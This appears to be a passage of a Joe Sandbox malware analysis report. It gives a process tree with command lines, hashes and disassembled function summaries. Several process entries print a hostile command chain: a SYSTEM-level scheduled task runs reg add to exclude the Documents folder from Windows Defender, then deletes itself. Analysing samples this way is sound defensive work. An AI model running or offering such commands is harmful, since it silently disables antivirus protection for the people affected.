Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6b6950000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6b8360000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	20:07:07
Start date:	12/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7cc810000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	462
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006FA2
@, xrefs: 0000000140006D6C

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

t, xrefs: 0000000140005ED1
o, xrefs: 0000000140005FA5
l, xrefs: 0000000140005F9B
r, xrefs: 0000000140005F6E
c, xrefs: 0000000140005F69
M, xrefs: 0000000140005E99
L, xrefs: 0000000140005EB9
t, xrefs: 0000000140005F73
v, xrefs: 0000000140005F64
c, xrefs: 0000000140005FAA
a, xrefs: 0000000140005F96
M, xrefs: 0000000140005EA9
., xrefs: 0000000140005ED9
l, xrefs: 0000000140005F87
i, xrefs: 0000000140005EC1
m, xrefs: 0000000140005F91
m, xrefs: 0000000140005F5A
a, xrefs: 0000000140005EE9
p, xrefs: 0000000140005EB1
d, xrefs: 0000000140005EE1
l, xrefs: 0000000140005FA0
s, xrefs: 0000000140005EC9
., xrefs: 0000000140005F78
l, xrefs: 0000000140005F82
t, xrefs: 0000000140005EF1
d, xrefs: 0000000140005F7D
s, xrefs: 0000000140005EA1
s, xrefs: 0000000140005F5F

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFDAC121C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDAC121C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDAC121C7A
_RTC_Initialize.LIBCMT ref: 00007FFDAC121CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDAC121CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFDAC121CF9

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: a80e5805063726af7ae4c6be3d2a99687bf2573c32fdc29fea7ff03b5eb66fcd
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 5181DF2BF0E64386FA57EB2598713B92290AF857F0F648035DA0C47797DE3CE945870A

Function 00007FFDAC121720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFDAC121753
FreeLibrary.KERNEL32 ref: 00007FFDAC121981

Part of subcall function 00007FFDAC121B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDAC121BC0
Part of subcall function 00007FFDAC121B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDAC121BC6

Part of subcall function 00007FFDAC121720: FindFirstFileA.KERNELBASE ref: 00007FFDAC121536

Strings

WordpadFilter.db, xrefs: 00007FFDAC121527

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 49545f774513b5474cfadeafd1bc68aa94f44736c10f2e49600d7426c826dc3c
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: 33319C33B16B41C9E741CBA1D8503AD73B5EB88798F144535EE4C13B46EE38D552C744

Function 00007FFDAC1211B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDAC1214EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDAC1214F7

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 8be228d02bfd7bfc9753dc65cfeb990f4b086cd44065f0e73e33ff108cd05160
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: 49816D27B1A78245E612CB3598102B9A6A4FF56BE4F248335EF5D53793EF3CE4928304

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

null, xrefs: 0000000140003FCE
SeLoadDriverPrivilege, xrefs: 000000014000402A
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

vseamps, xrefs: 0000000140001538
/service, xrefs: 000000014000153F
/remove, xrefs: 000000014000157E

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetActiveWindow, xrefs: 000000014000F075
MessageBoxA, xrefs: 000000014000F054
GetLastActivePopup, xrefs: 000000014000F094
USER32.DLL, xrefs: 000000014000F03B
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetProcessWindowStation, xrefs: 000000014000F10D

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

